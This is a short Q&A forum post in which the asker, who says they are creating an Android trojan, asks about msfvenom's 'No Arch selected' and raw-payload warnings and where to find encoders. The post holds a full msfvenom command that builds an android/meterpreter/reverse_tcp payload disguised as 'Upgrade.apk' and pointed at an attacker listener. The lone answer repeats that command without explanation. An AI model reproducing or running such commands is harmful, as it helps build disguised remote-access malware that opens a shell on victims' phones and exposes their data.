# Msfvenom No Arch selected, selecting arch: davlik from payload

Tags: metasploit

I was running a command to create an Android trojan. Command was:

```
msfvenom --platform android -p android/meterpreter/reverse_tcp LHOST =192.168.0.104 LPORT=4444 R > /root/Desktop/Upgrade.apk
```

I am getting the output:

```
No Arch selected, selecting arch: davlik from payload
No encoders or badchars specified, outputting raw payload.
```

What is the reason of this? 
How can this be fixed?
Where to get the encoders from?

Comment: All of this is available in the metasploit and msfvenom documentation. Have you read the documentation?

Comment: No not actually, my fault.. but any idea?

Comment: At some point, you will have to look up the documentation. If you still have questions once you do, you should come back to this question to edit it with those specifics.

Answer (score 0):

```
msfvenom --platform android -p android/meterpreter/reverse_tcp LHOST= LPORT=4444 R > /home/kali/Upgrade.apk
```

Comment: msfvenom --platform android -p android/meterpreter/reverse_tcp LHOST= LPORT=4444 R > /home/kali/Upgrade.apk

Comment: Please explain your answer or it may get deleted.